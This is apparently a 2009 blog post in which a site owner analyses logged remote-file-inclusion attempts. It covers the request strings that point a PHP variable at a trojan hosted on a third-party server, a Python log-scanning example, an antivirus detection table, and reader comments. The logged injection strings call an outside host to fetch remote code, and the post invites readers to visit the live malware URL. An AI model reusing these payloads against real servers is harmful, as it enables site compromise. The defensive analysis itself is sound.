Multiple Attempts to Drop Trojan on This Website Failed
These are the Wassup details of the attack:
69.65.41.165 2009-06-13 10:48:00
//?_SERVER[DOCUMENT_ROOT]=http://ww(…)omponents/com_frontpage/test.txt??
Referrer: Direct hit
Hostname: 69.65.41.165
- OS: WinVista
- BROWSER: IE 7
- 10:33:14 ->//?_SERVER[DOCUMENT_ROOT]=http://www.fox(…)com/components/com_frontpage/test.txt??
- 10:34:03 ->////?_SERVER[DOCUMENT_ROOT]=http://www.f(…)com/components/com_frontpage/test.txt??
- 10:34:30 ->/3099/google-treasure-chest-its-a-scam-a(…)com/components/com_frontpage/test.txt??
- 10:37:43 ->/3099////?_SERVER[DOCUMENT_ROOT]=http://(…)com/components/com_frontpage/test.txt??
- 10:37:46 ->////?_SERVER[DOCUMENT_ROOT]=http://www.f(…)com/components/com_frontpage/test.txt??
- 10:47:59 ->/3099////?_SERVER[DOCUMENT_ROOT]=http://(…)com/components/com_frontpage/test.txt??
- 10:48:00 ->////?_SERVER[DOCUMENT_ROOT]=http://www.f(…)com/components/com_frontpage/test.txt??
As you can see, _SERVER[DOCUMENT_ROOT]= is an attempt to set a PHP server variable through the query string: they have attempted to change my document root to that of http://www.foxreality.com, which is part of Rupert Murdoch’s empire.
The hyperlinks above don’t work as the code failed. However, if you are brave, strip out the first bit and just go to http://www.foxreality.com/components/com_frontpage/test.txt?? as I did, and hopefully your anti-virus or browser will kick in with a malware warning like mine did! The malware is identified as a Trojan by my NOD32 anti-virus software as PHP/Small.NAC trojan.
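To spot this kind of attempt in your own access logs, here is an added example in Python (not from the original post or the Wassup plugin): it parses request URIs shaped like the hits listed above, flags any query parameter that tries to set a PHP superglobal such as _SERVER[DOCUMENT_ROOT] to a remote URL, and tallies the hosts those URLs point at. The sample requests and the host malicious.example are constructed placeholders, not the real ones.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Keys an attacker may try to inject through the query string when
# register_globals is on, hoping a script's include() path is built from them.
SUPERGLOBAL_KEY = re.compile(r"^(?:_SERVER|_ENV|GLOBALS|_REQUEST|_COOKIE)\[[^\]]*\]$")
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

# Constructed sample request URIs in the shape of the Wassup hits above
# (malicious.example is a placeholder host, not the real one).
SAMPLE_REQUESTS = [
    "//?_SERVER[DOCUMENT_ROOT]=http://malicious.example/components/com_frontpage/test.txt??",
    "/3099////?_SERVER[DOCUMENT_ROOT]=http://malicious.example/components/com_frontpage/test.txt??",
    "/3099/google-treasure-chest-its-a-scam/",
    "/?page=about&id=3",
]

def find_rfi_attempts(request_uri):
    """Return (key, remote_url) pairs for every query parameter that tries to
    set a PHP superglobal to a remote URL; an empty list means the request is clean."""
    query = urlsplit(request_uri).query
    hits = []
    # keep_blank_values so the trailing "??" junk cannot hide the real parameter
    for key, value in parse_qsl(query, keep_blank_values=True):
        key = unquote(key)                  # second decode catches double-encoded keys
        value = unquote(value).rstrip("?")  # drop the "??" the attacker appends
        if SUPERGLOBAL_KEY.match(key) and REMOTE_URL.match(value):
            hits.append((key, value))
    return hits

def remote_hosts(request_uris):
    """Count the hosts the injected URLs point at, for blocking or abuse reports."""
    counts = {}
    for uri in request_uris:
        for _key, url in find_rfi_attempts(uri):
            host = urlsplit(url).hostname
            counts[host] = counts.get(host, 0) + 1
    return counts

if __name__ == "__main__":
    for uri in SAMPLE_REQUESTS:
        print(uri, "->", find_rfi_attempts(uri) or "clean")
    print("remote hosts:", remote_hosts(SAMPLE_REQUESTS))
```

Feed it the request column of your web server log instead of SAMPLE_REQUESTS to get the same report for real traffic.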
Conclusion
Someone has dumped a piece of malware on the Fox network and is now going round blogs and other websites to get them to point to the trojan and thus spread the nefarious package. It just needs one click!
As I type this, at 2009-06-13 10:51:43 I had two more attacks!!! That’s nine in the last few minutes.
Checking the web for references, I’ve found this Russian webpage where the trojan has been tested against various antivirus programs – about half don’t detect it and it’s from the end of May this year! See link, translated into English.
This is their test:
File test.txt received 2009.05.27 20:52:02 (UTC)
Current status: finished
Result: 16/40 (40%)
Quote:
| Antivirus | Version | Update | Result |
|---|---|---|---|
| a-squared | 4.0.0.101 | 2009.05.27 | Backdoor.PHP.Small.o!IK |
| AhnLab-V3 | 5.0.0.2 | 2009.05.27 | HTML/Xema |
| AntiVir | 7.9.0.168 | 2009.05.27 | BDS/PHP.ali.1 |
| Antiy-AVL | 2.0.3.1 | 2009.05.27 | - |
| Authentium | 5.1.2.4 | 2009.05.27 | - |
| Avast | 4.8.1335.0 | 2009.05.27 | - |
| AVG | 8.5.0.339 | 2009.05.27 | BackDoor.Generic_c.BTI |
| BitDefender | 7.2 | 2009.05.27 | Backdoor.PHP.ALI |
| CAT-QuickHeal | 10.00 | 2009.05.27 | - |
| ClamAV | 0.94.1 | 2009.05.27 | PHP.Shell-23 |
| Comodo | 1207 | 2009.05.27 | Unclassified Malware |
| DrWeb | 5.0.0.12182 | 2009.05.27 | - |
| eSafe | 7.0.17.0 | 2009.05.27 | - |
| eTrust-Vet | 31.6.6524 | 2009.05.27 | - |
| F-Prot | 4.4.4.56 | 2009.05.27 | - |
| F-Secure | 8.0.14470.0 | 2009.05.27 | Exploit:PHP/Preamble.A |
| Fortinet | 3.117.0.0 | 2009.05.27 | - |
| GData | 19 | 2009.05.27 | Backdoor.PHP.ALI |
| Ikarus | T3.1.1.57.0 | 2009.05.27 | - |
| K7AntiVirus | 7.10.746 | 2009.05.27 | - |
| Kaspersky | 7.0.0.125 | 2009.05.27 | - |
| McAfee | 5628 | 2009.05.27 | - |
| McAfee+Artemis | 5628 | 2009.05.27 | - |
| McAfee-GW-Edition | 6.7.6 | 2009.05.27 | Trojan.Backdoor.PHP.ali.1 |
| Microsoft | 1.4701 | 2009.05.27 | - |
| NOD32 | 4109 | 2009.05.27 | PHP/Small.NAC |
| Norman | 6.01.05 | 2009.05.27 | - |
| nProtect | 2009.1.8.0 | 2009.05.27 | Backdoor.PHP.ALI |
| Panda | 10.0.0.14 | 2009.05.27 | - |
| PCTools | 4.4.2.0 | 2009.05.21 | PHP.ShellBot.M |
| Prevx | 3.0 | 2009.05.27 | - |
| Rising | 21.31.21.00 | 2009.05.27 | - |
| Sophos | 4.42.0 | 2009.05.27 | Troj/PHPBdoor-A |
| Sunbelt | 3.2.1858.2 | 2009.05.27 | - |
| Symantec | 1.4.4.12 | 2009.05.27 | - |
| TheHacker | 6.3.4.3.332 | 2009.05.26 | - |
| TrendMicro | 8.950.0.1092 | 2009.05.27 | - |
| VBA32 | 3.12.10.6 | 2009.05.27 | Backdoor.PHP.Small.o |
| ViRobot | 2009.5.27.1757 | 2009.05.27 | - |
| VirusBuster | 4.6.5.0 | 2009.05.27 | PHP.ShellBot.M |
Additional Information
File size: 1165 bytes
MD5: f1a9b4e4b207cd38641061e1b72d4775
SHA1: 33c02179e53c19e00897fb0c63501acc0a2233e8
SHA256: 0b3eef46d7111939962db133d2e75530fbb7946d92a33195ca6b7f2e1affe43a
ssdeep: 24:kwauoGPmXvuH6dcFTGPmXvuH6dc4H6dcZ1Mpn6+YvKsLKPXVwuHENNTh:bBoCgMQsCgMQfQu1M5XW0SNl
PEiD: –
TrID: File type identification: HyperText Markup Language (100.0%)
PEInfo: –
PDFiD: –
RDS: NSRL Reference Data Set
Needless to say, I’ve blocked the source IP address now. It was from GigeNET in Illinois, and they’ve been told!

June 13, 2009 at 7:14 pm
I got the same thing on my server from 69.65.41.165
June 13, 2009 at 7:17 pm
Actually, if you check the text file without ?? marks, it looks like the script tries to read your hard drive’s contents:
========== “systrojan” below ========
SysTrojan
Wrong Place
June 13, 2009 at 7:26 pm
Yes, I just checked. It’s still there – you’d think Fox would do something about it!
I tried without the ?? as you suggested but it’s just the same message with my AV as before. It blocks it super-fast before anything else happens…
What time did you get your hits? Was it the same sort of time as me or has it just happened?